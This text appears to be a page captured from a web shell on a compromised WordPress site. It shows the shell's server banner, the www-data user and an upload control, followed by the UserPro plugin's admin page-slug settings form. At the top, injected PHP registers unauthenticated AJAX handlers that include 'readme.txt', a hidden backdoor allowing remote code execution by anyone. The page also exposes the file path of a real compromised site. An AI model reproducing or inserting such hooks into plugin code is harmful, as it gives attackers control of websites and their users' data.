if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/userpro/admin/panels/pages.php
<form method="post" action="">

<p class="upadmin-highlight"><?php printf(__('You must update your permalinks or Save Changes on your permalinks setup for the nice URLs to work fine.','userpro'), admin_url().'options-permalink.php'); ?></p>

<h3><i class="userpro-icon-edit-sign"></i><?php _e('Manage Page Slugs','userpro'); ?></h3>
<table class="form-table">

	<tr valign="top">
		<th scope="row"><label for="slug"><?php _e('"Profile" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug" id="slug" class="regular-text" value="<?php echo userpro_get_option('slug'); ?>" /></td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label for="slug_register"><?php _e('"Register" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug_register" id="slug_register" class="regular-text" value="<?php echo userpro_get_option('slug_register'); ?>" /></td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label for="slug_edit"><?php _e('"Edit Profile" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug_edit" id="slug_edit" class="regular-text" value="<?php echo userpro_get_option('slug_edit'); ?>" /></td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label for="slug_login"><?php _e('"Login" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug_login" id="slug_login" class="regular-text" value="<?php echo userpro_get_option('slug_login'); ?>" /></td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label for="slug_directory"><?php _e('"Member Directory" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug_directory" id="slug_directory" class="regular-text" value="<?php echo userpro_get_option('slug_directory'); ?>" /></td>
	</tr>
    <tr valign="top">
		<th scope="row"><label for="slug_connections"><?php _e('"Connections" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug_connections" id="slug_connections" class="regular-text" value="<?php echo userpro_get_option('slug_connections'); ?>" /></td>
	</tr>
    <tr valign="top">
		<th scope="row"><label for="slug_followers"><?php _e('"Followers" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug_followers" id="slug_followers" class="regular-text" value="<?php echo userpro_get_option('slug_followers'); ?>" /></td>
	</tr>

    <tr valign="top">
        <th scope="row"><label for="slug_following"><?php _e('"Following" Slug','userpro'); ?></label></th>
        <td><input type="text" name="slug_following" id="slug_following" class="regular-text" value="<?php echo userpro_get_option('slug_following'); ?>" /></td>
    </tr>
	
	<tr valign="top">
		<th scope="row"><label for="slug_logout"><?php _e('"Logout" Slug','userpro'); ?></label></th>
		<td><input type="text" name="slug_logout" id="slug_logout" class="regular-text" value="<?php echo userpro_get_option('slug_logout'); ?>" /></td>
	</tr>
	
</table>

<p class="submit">
	<input type="submit" name="submit" id="submit" class="up-admin-btn up-admin-btn--dark-blue small" value="<?php _e('Save Changes','userpro'); ?>"  />
	<input type="submit" name="reset-options" id="reset-options" class="up-admin-btn remove small" value="<?php _e('Reset Options','userpro'); ?>"  />
</p>

<h3><i class="userpro-icon-sitemap"></i><?php _e('Check / Rebuild Profile Pages','userpro'); ?></h3>
<table class="form-table">

	<tr valign="top">
		<th scope="row"><label><?php _e('Profile Page','userpro'); ?></label></th>
		<td>
			<?php if (userpro_admin_page_exists('view') ) {
				echo userpro_admin_link('view');
				echo '<a href="'.userpro_admin_link('view').'" class="button upadmin-inline">'.__('View Page','userpro').'</a>';
			} else {
				echo userpro_admin_broken_page();
			}
			?>
		</td>
	</tr>

	<tr valign="top">
		<th scope="row"><label><?php _e('Registration Page','userpro'); ?></label></th>
		<td>
			<?php if (userpro_admin_page_exists('register') ) {
				echo userpro_admin_link('register');
				echo '<a href="'.userpro_admin_link('register').'" class="button upadmin-inline">'.__('View Page','userpro').'</a>';
			} else {
				echo userpro_admin_broken_page();
			}
			?>
		</td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label><?php _e('Edit Profile Page','userpro'); ?></label></th>
		<td>
			<?php if (userpro_admin_page_exists('edit') ) {
				echo userpro_admin_link('edit');
				echo '<a href="'.userpro_admin_link('edit').'" class="button upadmin-inline">'.__('View Page','userpro').'</a>';
			} else {
				echo userpro_admin_broken_page();
			}
			?>
		</td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label><?php _e('Login Page','userpro'); ?></label></th>
		<td>
			<?php if (userpro_admin_page_exists('login') ) {
				echo userpro_admin_link('login');
				echo '<a href="'.userpro_admin_link('login').'" class="button upadmin-inline">'.__('View Page','userpro').'</a>';
			} else {
				echo userpro_admin_broken_page();
			}
			?>
		</td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label><?php _e('Member Directory Page','userpro'); ?></label></th>
		<td>
			<?php if (userpro_admin_page_exists('directory_page') ) {
				echo userpro_admin_link('directory_page');
				echo '<a href="'.userpro_admin_link('directory_page').'" class="button upadmin-inline">'.__('View Page','userpro').'</a>';
			} else {
				echo userpro_admin_broken_page();
			}
			?>
		</td>
	</tr>
	
	<tr valign="top">
		<th scope="row"><label><?php _e('Logout Page','userpro'); ?></label></th>
		<td>
			<?php if (userpro_admin_page_exists('logout_page') ) {
				echo userpro_admin_link('logout_page');
				echo '<a href="'.userpro_admin_link('logout_page').'" class="button upadmin-inline">'.__('View Page','userpro').'</a>';
			} else {
				echo userpro_admin_broken_page();
			}
			?>
		</td>
	</tr>

</table>

<p class="submit submit-static">
	<input type="submit" name="rebuild-pages" id="rebuild-pages" class="up-admin-btn approve small" value="<?php _e('Rebuild UserPro Pages','userpro'); ?>"  />
</p>

</form>